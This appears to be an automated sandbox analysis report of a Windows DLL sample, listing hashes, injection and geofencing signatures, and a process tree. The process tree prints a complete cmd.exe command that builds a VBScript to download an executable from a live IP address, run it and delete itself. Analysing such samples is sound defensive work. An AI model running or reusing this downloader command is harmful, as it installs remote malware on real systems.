Analysis
-
max time kernel
96s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-07-2022 08:40
Static task
static1
Behavioral task
behavioral1
Sample
3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
Resource
win10v2004-20220414-en
General
-
Target
3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll
-
Size
5KB
-
MD5
4b128c58a8afdc3a838018142fdb4bea
-
SHA1
73a1f572471d6cb23de20258d3db4860f82cac1c
-
SHA256
3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3
-
SHA512
3b1a1afa0729ed7d4d5f1c1fb8188e4ee007ad353a68255cb110a7940719d827ea9fc9cffd9074261c2d308f50c6ef5c324672188d33c5f8c56c3d83a6656ede
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
cscript.exeflow pid process 7 1016 cscript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cscript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
rundll32.exedescription pid process target process PID 2156 set thread context of 3884 2156 rundll32.exe rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
rundll32.exerundll32.exerundll32.execmd.exedescription pid process target process PID 4476 wrote to memory of 2156 4476 rundll32.exe rundll32.exe PID 4476 wrote to memory of 2156 4476 rundll32.exe rundll32.exe PID 4476 wrote to memory of 2156 4476 rundll32.exe rundll32.exe PID 2156 wrote to memory of 3884 2156 rundll32.exe rundll32.exe PID 2156 wrote to memory of 3884 2156 rundll32.exe rundll32.exe PID 2156 wrote to memory of 3884 2156 rundll32.exe rundll32.exe PID 2156 wrote to memory of 3884 2156 rundll32.exe rundll32.exe PID 3884 wrote to memory of 4424 3884 rundll32.exe cmd.exe PID 3884 wrote to memory of 4424 3884 rundll32.exe cmd.exe PID 3884 wrote to memory of 4424 3884 rundll32.exe cmd.exe PID 4424 wrote to memory of 1016 4424 cmd.exe cscript.exe PID 4424 wrote to memory of 1016 4424 cmd.exe cscript.exe PID 4424 wrote to memory of 1016 4424 cmd.exe cscript.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\3c15051a084a44625da869f347945191adea3ba8ed8c6830e92add6a2f0b4cd3.dll,#12⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c echo on error resume next >%TEMP%\Sz7Xk0.vbs && echo Set xPost = CreateObject("Msxml2.XMLHTTP") >>%TEMP%\Sz7Xk0.vbs && echo xPost.Open "GET","http://107.148.195.71/w_download.exe ",0 >>%TEMP%\Sz7Xk0.vbs && echo xPost.Send() >>%TEMP%\Sz7Xk0.vbs && echo Set aGet = CreateObject("ADODB.Stream") >>%TEMP%\Sz7Xk0.vbs && echo aGet.Mode = 3 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Type = 1 >>%TEMP%\Sz7Xk0.vbs && echo aGet.Open() >>%TEMP%\Sz7Xk0.vbs && echo aGet.Write(xPost.responseBody) >>%TEMP%\Sz7Xk0.vbs && echo aGet.SaveToFile "%TEMP%\12345678.exe",2 >>%TEMP%\Sz7Xk0.vbs && echo wscript.sleep 1000 >>%TEMP%\Sz7Xk0.vbs && echo Set Shell = CreateObject("Wscript.Shell") >>%TEMP%\Sz7Xk0.vbs && echo Shell.Run ("%TEMP%\12345678.exe") >>%TEMP%\Sz7Xk0.vbs && echo CreateObject("Scripting.Filesystemobject").DeleteFile(WScript.ScriptFullName) >>%TEMP%\Sz7Xk0.vbs && cscript.exe //nologo %TEMP%\Sz7Xk0.vbs4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbs5⤵
- Blocklisted process makes network request
- Checks computer location settings
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Sz7Xk0.vbsFilesize
558B
MD52f8fa35bb6829ce8ee55c2c69532c4a7
SHA1f5a2a9f60c0ce0094d77a338ebe2574c8f4a58ed
SHA256c43489b039542edcc3f573e258b6bd4f5fbe1ca646e3bd3c91cef3f2aea8dad6
SHA512436cca14f204dd28b1e39821f720757ee03641ef084cfc99e89d61e3f36b3b047a1a9ccdd978db8a5460c3e09ad9b734aa2b47db9fb3ea784ef249b935e44f19
-
memory/1016-133-0x0000000000000000-mapping.dmp
-
memory/2156-130-0x0000000000000000-mapping.dmp
-
memory/3884-131-0x0000000000000000-mapping.dmp
-
memory/4424-132-0x0000000000000000-mapping.dmp